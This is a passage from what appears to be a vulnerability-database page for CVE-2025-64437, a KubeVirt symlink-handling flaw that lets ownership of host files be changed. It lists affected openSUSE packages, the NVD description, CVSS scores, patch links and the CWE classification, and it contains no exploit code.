"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-26T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
FKIE_CVE-2025-64437
Vulnerability from fkie_nvd - Published: 2025-11-07 23:15 - Updated: 2025-11-25 17:16
Severity ?
Summary
KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E",
"versionEndExcluding": "1.5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "78254CFF-E38D-4C0A-AB4B-3F41FCBB2A3C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1."
},
{
"lang": "es",
"value": "KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. En versiones anteriores a la 1.5.3 y 1.6.1, el virt-handler no verifica si el launcher-sock es un enlace simb\u00f3lico o un archivo regular. Este descuido puede ser explotado, por ejemplo, para cambiar la propiedad de archivos arbitrarios en el nodo anfitri\u00f3n al usuario sin privilegios con UID 107 (el mismo usuario utilizado por virt-launcher), comprometiendo as\u00ed la CIA (Confidencialidad, Integridad y Disponibilidad) de los datos en el anfitri\u00f3n. Para explotar con \u00e9xito esta vulnerabilidad, un atacante deber\u00eda tener el control del sistema de archivos del pod virt-launcher. Esta vulnerabilidad est\u00e1 corregida en las versiones 1.5.3 y 1.6.1."
}
],
"id": "CVE-2025-64437",
"lastModified": "2025-11-25T17:16:45.050",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 3.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-11-07T23:15:46.147",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-59"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…